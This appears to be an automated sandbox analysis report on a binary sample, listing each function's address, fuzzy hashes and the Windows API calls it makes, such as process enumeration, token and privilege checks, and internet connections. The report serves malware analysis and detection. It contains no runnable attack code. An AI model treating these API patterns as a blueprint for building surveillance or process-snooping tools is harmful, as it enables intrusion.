Opcode ID: 02afe434a7e62ff901003a394cc3f54444c66915939e42e2a1ac564dfb3b5e2b
Instruction ID: acc61888c11b3459df3094e66c7e93ea37c958bb1fad739063b9bf2fa6849d59
Opcode Fuzzy Hash: 02afe434a7e62ff901003a394cc3f54444c66915939e42e2a1ac564dfb3b5e2b
Instruction Fuzzy Hash: 7631CE31A04246BFDF219F65CC48BAB7BB9BF42330F168028E864C71A1DB30D950EB90

Function 00F84EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00F84F02

Part of subcall function 00F63641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F6365B
Part of subcall function 00F63641: GetCurrentThreadId.KERNEL32 ref: 00F63662
Part of subcall function 00F63641: AttachThreadInput.USER32(00000000,?,00F65005), ref: 00F63669

GetCaretPos.USER32(?), ref: 00F84F13
ClientToScreen.USER32(00000000,?), ref: 00F84F4E
GetForegroundWindow.USER32 ref: 00F84F54

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 73e1441cc38d7a07fa7cf2510237de8308f4675f3f2cdcadb430c8dbbab7bf1c
Instruction ID: 948d4c19a3f9416d9cde42e18f4ed4f31c6a3a19e044a5fee69a067fd7b4e880
Opcode Fuzzy Hash: 73e1441cc38d7a07fa7cf2510237de8308f4675f3f2cdcadb430c8dbbab7bf1c
Instruction Fuzzy Hash: DD310E71D00108AFDB00EFA5CC859EFB7F9EF94304F50406AE555E7242EA759E059BA1

Function 00F63C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F63C7A
Process32FirstW.KERNEL32(00000000,?), ref: 00F63C88
Process32NextW.KERNEL32(00000000,?), ref: 00F63CA8
CloseHandle.KERNEL32(00000000), ref: 00F63D52

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ae4e743e8ea71b2bc37e0d86382a69c2960437640cad88490fbeb472f2bb8eb4
Instruction ID: 3aa33b71db44dc5e12e6d173a342a2e86ac0f5afca709871e2f8848e273e1554
Opcode Fuzzy Hash: ae4e743e8ea71b2bc37e0d86382a69c2960437640cad88490fbeb472f2bb8eb4
Instruction Fuzzy Hash: B431A2715083099FD300EF50DC85ABFBBE8EF95354F50082DF582861A1EB71EA49EB92

Function 00F8C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

GetCursorPos.USER32(?), ref: 00F8C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F3B9AB,?,?,?,?,?), ref: 00F8C4E7
GetCursorPos.USER32(?), ref: 00F8C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F3B9AB,?,?,?), ref: 00F8C56E

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 0008eb348f186c9ae46e5ed6d1aefee93b4360b91127312136e638762ca82508
Instruction ID: c64645c398443dc26a946e9887c3d9e47a3a6f5325cbc98ed99c9abe2abb5289
Opcode Fuzzy Hash: 0008eb348f186c9ae46e5ed6d1aefee93b4360b91127312136e638762ca82508
Instruction Fuzzy Hash: DA316F35A00058AFCF25DF58CC58EFA7BB5EB09720F484169F9058B2A1C731A990FBE4

Function 00F58656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F58121
Part of subcall function 00F5810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F5812B
Part of subcall function 00F5810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F5813A
Part of subcall function 00F5810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58141
Part of subcall function 00F5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F58157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F586A3
_memcmp.LIBCMT ref: 00F586C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F586FC
HeapFree.KERNEL32(00000000), ref: 00F58703

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 3a062567d075831005c7dc02f1214042906ffb11e087b31e0f89ac4aae989ce2
Instruction ID: 221d522c09a4662c80c6f7b42b1bb2a8d1790b1e597ce372e21a8744ff0e6497
Opcode Fuzzy Hash: 3a062567d075831005c7dc02f1214042906ffb11e087b31e0f89ac4aae989ce2
Instruction Fuzzy Hash: 69219D71E01109EFDB10DFA4C989BEEB7B8EF45356F154059E944BB241DB30AE0AEB90

Function 00F2098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00F209AE

Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67896,?,?,00000000), ref: 00F05A2C
Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67896,?,?,00000000,?,?), ref: 00F05A50

_fprintf.LIBCMT ref: 00F209E5
OutputDebugStringW.KERNEL32(?), ref: 00F55DBB

Part of subcall function 00F24AAA: _flsall.LIBCMT ref: 00F24AC3

__setmode.LIBCMT ref: 00F20A1A

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: fa6cf197c4b4ffc4a0a18b35a77c62ee83d54d73007553ac051e6d8288ae5d00
Instruction ID: 43e21f565776d5d846aa1c88a0c8c26ca62a2def26df2ea2c5f8e1b3cd77c519
Opcode Fuzzy Hash: fa6cf197c4b4ffc4a0a18b35a77c62ee83d54d73007553ac051e6d8288ae5d00
Instruction Fuzzy Hash: 15113A73A082146FDB04B7B4BC479FEBBA89F41320F644119F105572C3EEAC68467BA5

Function 00F71767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F717A3

Part of subcall function 00F7182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7184C
Part of subcall function 00F7182D: InternetCloseHandle.WININET(00000000), ref: 00F718E9

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: a48b7a60dd8b020ffc8623d09e166405b7ecb3a05db332fd707f5391b38cf7b7
Instruction ID: 61606b6f2ff70faec8d6cf1edc58d2596c7632d850b1176f6fd4c0c6f4b21b1e
Opcode Fuzzy Hash: a48b7a60dd8b020ffc8623d09e166405b7ecb3a05db332fd707f5391b38cf7b7
Instruction Fuzzy Hash: 4921D432600605BFEB169F64DC01FBABBA9FF48710F10802FF91996550D771D829B7A2

Function 00F63A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00F8FAC0), ref: 00F63A64
GetLastError.KERNEL32 ref: 00F63A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F63A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F8FAC0), ref: 00F63ADF

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 3ab06568868ff668db492f1687e7e4cc709d3305a5330a7f3742b6d204168cb8
Instruction ID: 898fcf5b8b4171154fafd1df09c90bdecebe28791a4f3ceb474f679af6d97b6d
Opcode Fuzzy Hash: 3ab06568868ff668db492f1687e7e4cc709d3305a5330a7f3742b6d204168cb8
Instruction Fuzzy Hash: C42191359082059FC700EF68C8818ABB7E4AE55364F144A2DF499C72E1D735DA4AFB42

Function 00F5DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F5DCD3,?,?,?,00F5EAC6,00000000,000000EF,00000119,?,?), ref: 00F5F0CB
Part of subcall function 00F5F0BC: lstrcpyW.KERNEL32(00000000,?,?,00F5DCD3,?,?,?,00F5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F5F0F1
Part of subcall function 00F5F0BC: lstrcmpiW.KERNEL32(00000000,?,00F5DCD3,?,?,?,00F5EAC6,00000000,000000EF,00000119,?,?), ref: 00F5F122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F5DCEC
lstrcpyW.KERNEL32(00000000,?,?,00F5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F5DD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00F5EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F5DD46

Strings

cdecl, xrefs: 00F5DD3D

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 8394e953f5bf024b3a5eb14620227ca0296a9a4af058fd11718a0e4a97203cf3
Instruction ID: d7c8e4273d259b085e6a790314d6735f0a7998150a762b53acae54e7967acb70
Opcode Fuzzy Hash: 8394e953f5bf024b3a5eb14620227ca0296a9a4af058fd11718a0e4a97203cf3
Instruction Fuzzy Hash: D311B13A201305EFCB25AF34DC459BA77B8FF45320B80406AED06CB2A1EB719854E791

Function 00F350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F35101

Part of subcall function 00F2571C: __FF_MSGBANNER.LIBCMT ref: 00F25733
Part of subcall function 00F2571C: __NMSG_WRITE.LIBCMT ref: 00F2573A
Part of subcall function 00F2571C: RtlAllocateHeap.NTDLL(018A0000,00000000,00000001,00000000,?,?,?,00F20DD3,?), ref: 00F2575F

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9d2d24b281e9b56f537b8223b058f8d659bfd11df2b9e571de3baf5ddd84bf35
Instruction ID: bfcf6d69eac507fffd81101bde98f392df899d39b5400935bbfc34cd3c7d5f4e
Opcode Fuzzy Hash: 9d2d24b281e9b56f537b8223b058f8d659bfd11df2b9e571de3baf5ddd84bf35
Instruction Fuzzy Hash: 5811C2B2905A29AECF313F74BC45BAE37989F94BB1F104929F9049A161DE388941B790

Function 00F044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F044CF

Part of subcall function 00F0407C: _memset.LIBCMT ref: 00F040FC
Part of subcall function 00F0407C: _wcscpy.LIBCMT ref: 00F04150
Part of subcall function 00F0407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F04160

KillTimer.USER32(?,00000001,?,?), ref: 00F04524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F04533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F3D4B9

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: e5685b9824aebf70961f0e3ba08c53cddfb3df5ff289ea6a2ce7ed8f044f7c9b
Instruction ID: 47f7a4de96bca5da0e4dbcf45e4dc96beda907a2987f82ca266e236e4970af39
Opcode Fuzzy Hash: e5685b9824aebf70961f0e3ba08c53cddfb3df5ff289ea6a2ce7ed8f044f7c9b
Instruction Fuzzy Hash: 5D21B6B1904794AFE732CB24DC55BF6BBEC9B05328F14009DE79A57181C3742988B751

Function 00F76369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F67896,?,?,00000000), ref: 00F05A2C
Part of subcall function 00F05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F67896,?,?,00000000,?,?), ref: 00F05A50

gethostbyname.WSOCK32(?,?,?), ref: 00F76399
WSAGetLastError.WSOCK32(00000000), ref: 00F763A4
_memmove.LIBCMT ref: 00F763D1
inet_ntoa.WSOCK32(?), ref: 00F763DC

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e0ff0559bb823d57db220e10082523d276955bce1eca982f31bc277403651154
Instruction ID: 64f81b0f3ec33fa278338836f51f07ab80b71fb25c6546cbe0c6b8f0a28c0003
Opcode Fuzzy Hash: e0ff0559bb823d57db220e10082523d276955bce1eca982f31bc277403651154
Instruction Fuzzy Hash: 25112172900109AFCF04FBA4DD46DEE77B8AF04310B548065F505E72A2DB789E18FB61

Function 00F58B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00F58B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F58B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F58B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F58BA4

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 80b6bf90bd87686d06c5a3c9d0e0fa139bd3d8eebca30af5dd6a2d115ec0b41b
Instruction ID: 9d65ceeccd3997c66d1d75cd19f78ec41c71a89f78237bc28a5f56be488b513e
Opcode Fuzzy Hash: 80b6bf90bd87686d06c5a3c9d0e0fa139bd3d8eebca30af5dd6a2d115ec0b41b
Instruction Fuzzy Hash: B7114C79900218FFDB10DF95CC84FADBB78FB48750F204195EA00B7250DA716E15EB94

Function 00F01290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

DefDlgProcW.USER32(?,00000020,?), ref: 00F012D8
GetClientRect.USER32(?,?), ref: 00F3B5FB
GetCursorPos.USER32(?), ref: 00F3B605
ScreenToClient.USER32(?,?), ref: 00F3B610

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: db97f6f5c481a993234d3fffe91ba83573ee7b2bdc8a6a0bc6e94339cb9fa4f0
Instruction ID: b0d44093550cd9511b15961c78820b3e6224416b186a107303448c95bb5c62c8
Opcode Fuzzy Hash: db97f6f5c481a993234d3fffe91ba83573ee7b2bdc8a6a0bc6e94339cb9fa4f0
Instruction Fuzzy Hash: 83110236A00019EFCB00EFA8D8899FE77B8FB05301F400456FA01E7281D734AA95BBA5

Function 00F61142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F5FCED,?,00F60D40,?,00008000), ref: 00F6115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F5FCED,?,00F60D40,?,00008000), ref: 00F61184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F5FCED,?,00F60D40,?,00008000), ref: 00F6118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00F5FCED,?,00F60D40,?,00008000), ref: 00F611C1

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d22f3693d38778d4bdf884578f34144255688aed0fc929af2154729e1c230a93
Instruction ID: 6870fc0ef96040d467584b4a7d0099ea5a60eda0adf1835ba1f5713e88eec27d
Opcode Fuzzy Hash: d22f3693d38778d4bdf884578f34144255688aed0fc929af2154729e1c230a93
Instruction Fuzzy Hash: 19117C32C0092DDBCF009FA4D888AEEBB7CFF0A711F144056EA40B2240CB749554EBA1

Function 00F5D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F5D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F5D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F5D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F5D897

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 63f3849552017e0fdc55c0ed186034fe8cbf4139cfa942aba1b5c05cba0a236a
Instruction ID: 14c148bd63ffcd897a81a3a6ebda3ffc1c8477eb0576fe2436c308a0bd50ab3d
Opcode Fuzzy Hash: 63f3849552017e0fdc55c0ed186034fe8cbf4139cfa942aba1b5c05cba0a236a
Instruction Fuzzy Hash: 97116175606304DFE730CF50EC09FA3BBBCEB00B12F10856AAA16D6090D7B0E54DABA1

Function 00F36FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00F36FDB

Part of subcall function 00F376C2: __fltout2.LIBCMT ref: 00F376EB

__cftog_l.LIBCMT ref: 00F37001
__cftoe_l.LIBCMT ref: 00F37033

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
